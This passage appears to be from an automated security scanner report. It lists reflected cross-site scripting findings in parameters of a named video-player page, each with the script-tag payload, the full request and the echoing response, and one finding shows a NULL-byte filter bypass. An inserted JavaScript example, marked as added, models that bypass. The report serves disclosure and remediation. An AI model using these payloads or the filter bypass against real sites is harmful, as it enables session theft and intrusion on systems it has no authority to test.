&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0ca5a4</script><script>alert(1)</script>48dcf77890a&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environme
...[SNIP]...

2.555. http://iad.bigpondvideo.com/indexInfinityPlayer.php [liveBwOption parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the liveBwOption request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40408</script><script>alert(1)</script>fb502458fa9 was submitted in the liveBwOption parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=340408</script><script>alert(1)</script>fb502458fa9&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:45 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=340408</script><script>alert(1)</script>fb502458fa9&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&en
...[SNIP]...

2.556. http://iad.bigpondvideo.com/indexInfinityPlayer.php [location parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the location request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e7b</script><script>alert(1)</script>aed1b5279a6 was submitted in the location parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html60e7b</script><script>alert(1)</script>aed1b5279a6&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:34 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
h=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html60e7b</script><script>alert(1)</script>aed1b5279a6&randId=43&os=MacOs&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code
       </script>
...[SNIP]...

2.557. http://iad.bigpondvideo.com/indexInfinityPlayer.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44454</script><script>alert(1)</script>1e1c9d361dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?44454</script><script>alert(1)</script>1e1c9d361dc=1 HTTP/1.1
Host: iad.bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:49:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 7279

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
                       'pluginspage','http://www.macromedia.com/go/getflashplayer',
                               'wmode','transparent'
                               , 'flashvars','randFlashId=&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&44454</script><script>alert(1)</script>1e1c9d361dc=1&fullScreen=1&showOverlays=1&wmv=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code
       </script>
...[SNIP]...

2.558. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the os request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6ee7</script><script>alert(1)</script>e83ff9c6a5e was submitted in the os parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOsc6ee7</script><script>alert(1)</script>e83ff9c6a5e HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:49 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8544

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOsc6ee7</script><script>alert(1)</script>e83ff9c6a5e&showOverlays=1&debug=0'+"&screenWidth="+screen.width+"&screenHeight="+screen.height); //end AC code
       </script>
...[SNIP]...

2.559. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the os request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 525ff</script><script>alert(1)</script>b2ad6f2e1ef was submitted in the os parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs525ff</script><script>alert(1)</script>b2ad6f2e1ef HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:15:44 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8544

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
exOf("Microsoft") != -1;
var isError                    = false;
var showBw                    = "1";
var showFeedback            = "1";
var showMenu                = "1";
var showTooltip                = "1";
var loadedItemCount            = 0;
var os                        = "MacOs525ff</script><script>alert(1)</script>b2ad6f2e1ef";
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                    = 1;
var totalItemCount            = (os != 'MacOs') ? 3 : 7;
var videoWidth                = "34
...[SNIP]...

2.560. http://iad.bigpondvideo.com/indexInfinityPlayer.php [phpSessionId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the phpSessionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 757ba</script><script>alert(1)</script>ff7169f68fb was submitted in the phpSessionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a757ba</script><script>alert(1)</script>ff7169f68fb&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:10 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=73ea39790c1c2e460204b93410a6ce32; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
go/getflashplayer',
                               'wmode','transparent'
                               , 'flashvars','randFlashId=43&platform=Production&phpSessionId=73ea39790c1c2e460204b93410a6ce32&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a757ba</script><script>alert(1)</script>ff7169f68fb&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0
...[SNIP]...

2.561. http://iad.bigpondvideo.com/indexInfinityPlayer.php [platformId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the platformId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91973</script><script>alert(1)</script>34f3d3765b4 was submitted in the platformId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=191973</script><script>alert(1)</script>34f3d3765b4&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:43 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
mgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=191973</script><script>alert(1)</script>34f3d3765b4&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacO
...[SNIP]...

2.562. http://iad.bigpondvideo.com/indexInfinityPlayer.php [propertyId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the propertyId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001e6f1</script><script>alert(1)</script>998804cba3 was submitted in the propertyId parameter. This input was echoed as 1e6f1</script><script>alert(1)</script>998804cba3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) or another filter written in native code, where a string ends at the first NULL byte: the filter inspects only the bytes before the %00, while PHP, whose strings carry an explicit length, keeps the whole value and writes it into the page. Two details of this response are worth noting. The NULL byte comes back as the two characters \0 while the script tags are untouched, so whatever escaping runs on this parameter handles NULL but not < and >; and the other findings against this page reflect the same tags with no NULL byte at all, so the block seen here is not a page-wide control. Fix the vulnerability in the application code by encoding on output, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
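
Worked example, added here and not from the report or from the vendor: a model of the NULL byte bypass described above, with the native-code filter and the length-aware application side next to each other. The filter and rendering functions are assumptions made for the illustration; the query value is constructed from the propertyId probe on this page.

```javascript
// Added example, not code from the report or from the vendor. It models the
// NULL-byte bypass the report describes: a filter working over C strings
// stops reading at the first NUL, while a length-aware runtime (PHP here)
// keeps and echoes everything after it. Function names and RAW_PARAM are
// constructed for the illustration.

// Constructed probe in the report's style: "%00" ahead of the script tags.
const RAW_PARAM = "51%001e6f1</script><script>alert(1)</script>998804cba3";

// Query-string decoding turns "%00" into a real NUL byte.
function decodeParam(raw) {
  return decodeURIComponent(raw);
}

// What a C-string routine (strlen, strstr, a regex over a char*) gets to see:
// everything up to, not including, the first NUL.
function asCString(value) {
  const nul = value.indexOf("\0");
  return nul === -1 ? value : value.slice(0, nul);
}

// A blocklist rule as a native-code filter would apply it. The rule itself
// is fine; the bypass is in what it is given to inspect.
function nativeFilterAllows(value) {
  return !/<\/?script/i.test(asCString(value));
}

// The application side: PHP strings carry their length, so the whole value,
// NUL included, is concatenated into the flashvars string in the page.
function applicationEchoes(value) {
  return "'flashvars','propertyId=" + value + "&siteId=1'";
}

// The same rule run over the full value, with NUL rejected outright. This is
// what a correct WAF rule has to do; it still does not replace output
// encoding in the application.
function lengthAwareFilterAllows(value) {
  if (value.includes("\0")) return false;
  return !/<\/?script/i.test(value);
}

function demonstrateNulBypass() {
  const value = decodeParam(RAW_PARAM);
  return {
    filterSaw: asCString(value),                         // "51"
    nativeAllowed: nativeFilterAllows(value),             // true: the bypass
    echoedTags: applicationEchoes(value)
      .includes("</script><script>alert(1)</script>"),   // true
    lengthAwareAllowed: lengthAwareFilterAllows(value),   // false
    // Without the NUL the same rule catches the tags, which is why the
    // plain payload and the %00 variant behave differently at the filter.
    withoutNulAllowed: nativeFilterAllows(decodeParam("51</script>")), // false
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demonstrateNulBypass());
}
```

Run with node. The native-style filter sees only "51" and lets the request through; the application echoes the full value, script tags included; the length-aware rule rejects it. The last field shows the rule is not wrong in itself, only blind past the NUL, which is why the report recommends fixing the reflection in the application rather than relying on the filter.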

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51%001e6f1</script><script>alert(1)</script>998804cba3&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:52 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8679

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
BwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51\01e6f1</script><script>alert(1)</script>998804cba3&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays
...[SNIP]...

2.563. http://iad.bigpondvideo.com/indexInfinityPlayer.php [radio parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the radio request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e507</script><script>alert(1)</script>eb57accf720 was submitted in the radio parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

